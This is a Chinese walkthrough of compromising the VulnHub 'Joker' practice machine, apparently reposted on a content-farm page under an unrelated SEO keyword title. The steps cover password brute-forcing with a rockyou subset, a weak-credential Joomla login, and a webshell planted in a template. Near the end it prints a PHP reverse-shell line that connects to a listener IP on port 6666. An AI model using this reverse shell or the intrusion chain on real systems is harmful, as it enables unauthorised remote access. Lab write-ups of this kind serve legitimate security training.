当前位置: 首页> 娱乐> 明星 > it培训机构培训_关注公众号功能开发_保定网站建设方案优化_宁波seo外包费用

it培训机构培训_关注公众号功能开发_保定网站建设方案优化_宁波seo外包费用

时间:2025/7/11 21:25:11来源:https://blog.csdn.net/2401_85578339/article/details/146349480 浏览次数:0次
it培训机构培训_关注公众号功能开发_保定网站建设方案优化_宁波seo外包费用

1.下载打开靶机

下载地址:https://download.vulnhub.com/ha/joker.zip

2.扫描靶机ip

3.访问靶机ip

开启了的端口11尝试

4.扫描敏感目录

5.访问secret.txt

多次出现rock,指的是kali自带的rockyou.txt字典;100指的是取字典的前100个;再结合前文,可知应该采用爆破登录8080的网站

6.下载字典前100个

进入文档内,解压文件rockyou.txt.gz

head -n 100 /usr/share/wordlists/rockyou.txt > test.txt

7.bp抓包发现登录信息使用了base64编码

8.发送到instructer进行攻击

设置payload

添加payload值

设置规则

攻击

将结果进行base64解码

9.登录8080端口

10.发现是joomla框架的网页,其弱口令是joomla/joomla,尝试使用弱口令登陆后台

继续登录

11.寻找漏洞

尝试后台getshell:Extensions---templates---templates----beez3

12..新建木马

13.蚁剑连接

14.反弹shell

创建一个新文件写入反弹shell的php代码

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.174/6666 0>&1'");?>

访问666.php,kali监听

关键字:it培训机构培训_关注公众号功能开发_保定网站建设方案优化_宁波seo外包费用

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: